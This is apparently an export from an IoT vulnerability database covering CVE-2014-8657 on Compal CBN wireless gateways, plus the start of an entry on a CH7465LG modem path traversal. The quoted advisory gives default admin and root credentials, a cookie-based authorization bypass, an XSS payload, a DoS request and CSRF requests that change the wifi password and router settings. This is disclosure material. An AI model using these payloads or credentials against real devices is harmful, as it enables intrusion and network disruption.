"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0180",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "BID",
"id": "70762"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 0.4
},
"cve": "CVE-2014-8657",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8657",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-76602",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8657",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8657",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-192",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76602",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities\n2. A denial-of-service vulnerability\n3. An HTML-injection vulnerability\n4. Other attacks are also possible. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. \n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76602",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76602"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8657",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.6
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113838",
"trust": 1.8
},
{
"db": "BID",
"id": "70762",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "XF",
"id": "98330",
"trust": 0.6
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76602",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"id": "VAR-201411-0180",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.379000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98330"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8657"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/98330"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76602"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76602"
},
{
"date": "2014-10-28T00:00:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"date": "2014-11-06T15:55:10.960000",
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76602"
},
{
"date": "2014-12-03T00:56:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005244"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-192"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8657"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Service disruption in other firmware (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005244"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-192"
}
],
"trust": 0.6
}
}
VAR-201910-0452
Vulnerability from variot - Updated: 2024-11-23 23:11The web interface of the Compal Broadband CH7465LG modem (version CH7465LG-NCIP-6.12.18.25-2p6-NOSH) is vulnerable to a /%2f/ path traversal attack, which can be exploited in order to test for the existence of a file pathname outside of the web root directory. If a file exists but is not part of the product, there is a 404 error. If a file does not exist, there is a 302 redirect to index.html. Compal Broadband CH7465LG Modem contains a path traversal vulnerability.Information may be obtained. The Compal Broadband CH7465LG modem is a modem from Compal, Taiwan
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-0452",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ch7465lg",
"scope": "eq",
"trust": 1.6,
"vendor": "compal",
"version": "ch7465lg-ncip-6.12.18.25-2p6-nosh"
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch7465lg-ncip-6.12.18.25-2p6-nosh"
},
{
"model": "broadband ch7465lg modem ch7465lg-ncip-6.12.18.25-2p6-nosh",
"scope": null,
"trust": 0.6,
"vendor": "compal",
"version": null
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:compal_broadband_networks:ch7465lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
}
]
},
"cve": "CVE-2019-17224",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-17224",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-39938",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
